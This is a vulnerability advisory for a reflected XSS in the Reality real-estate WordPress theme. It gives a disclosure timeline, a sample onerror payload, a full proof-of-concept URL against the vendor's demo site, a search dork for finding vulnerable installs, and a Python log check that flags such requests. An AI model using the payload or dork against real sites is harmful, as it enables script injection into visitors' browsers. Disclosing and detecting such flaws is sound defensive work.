Reality < 2.5.3 - Unauthenticated Reflected XSS



Description
Reflected XSS was discovered in the «Reality | Estate Multipurpose WordPress Theme». Tested version: v2.5.1.

Edit (WPScanTeam):
January 16th, 2020 - Report Received & Envato Contacted
January 17th, 2020 - Envato Investigating
February 6th, 2020 - Envato Contacted Again for Updates
February 7th, 2020 - Author is not responding to Envato, theme has been disabled on the Marketplace. Disclosing the issue.
March 18th, 2020 - v2.5.3 released

Proof of Concept
----[]- Info: -[]----
Demo website: http://reality.inwavethemes.com/
Google Dork: /wp-content/themes/reality/


----[]- Reflected XSS: -[]----
Payload Sample: "><img src=x onerror=(alert)(`m0ze`);//">

PoC: http://reality.inwavethemes.com/properties/?status=&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`m0ze`);//%22%3E&type=&from-year=&to-year=&min-price=&max-price=&bathrooms=&bedrooms=&garages=&min-garages_size=&max-garages_size=&min-land_size=&max-land_size=
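
A log check for the request pattern in the PoC above, added here as an example (it is not part of the original advisory or of the theme's code): it flags requests to the /properties/ search page whose query values decode to markup characters. The log lines are constructed, and the combined-log layout, the root-install path and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Request field of a combined-format access log line (layout is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters needed to close an HTML attribute value and open a new tag.
BREAKOUT_RE = re.compile(r'[<>"]')
SEARCH_PATH = "/properties/"  # search page from the PoC URL; assumes a root install


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (bounded) so %253C is treated like '<'."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return the query parameters whose decoded value carries markup."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.startswith(SEARCH_PATH):
        return []
    return [name for name, value in parse_qsl(url.query, keep_blank_values=True)
            if BREAKOUT_RE.search(fully_decode(value))]


# Constructed sample lines (documentation IP range, harmless <b> markup).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Mar/2020:10:00:00 +0000] "GET /properties/?status=&keyword=villa+with+pool&type= HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Mar/2020:10:00:05 +0000] "GET /properties/?status=&keyword=%22%3E%3Cb%3Eprobe%3C%2Fb%3E&type= HTTP/1.1" 200 5210',
    '203.0.113.9 - - [01/Mar/2020:10:00:09 +0000] "GET /properties/?keyword=%2522%253E%253Cb%253Eprobe&type= HTTP/1.1" 200 5198',
    '203.0.113.4 - - [01/Mar/2020:10:00:12 +0000] "GET /contact/?message=%3Cb%3Ehi HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        hits = suspicious_params(line)
        if hits:
            print("markup in", hits, "->", line.split('"')[1])
```

A hit means the request carried markup, not that it executed; whether the value is reflected unescaped depends on the installed theme version (fixed in 2.5.3).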

Affects Theme

Fixed in version 2.5.3

References

URL: https://themeforest.net/item/reality-real-estate-wordpress-theme/21627776

Classification

Type: XSS
OWASP Top 10: A7: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Original Researcher: m0ze
Submitter: m0ze
Submitter Twitter: m0ze_ru
Verified: Yes
WPVDB ID: 10064

Timeline

Publicly Published: 2020-01-16 (5 months ago)
Added: 2020-02-07 (4 months ago)
Last Updated: 2020-04-09 (about 2 months ago)
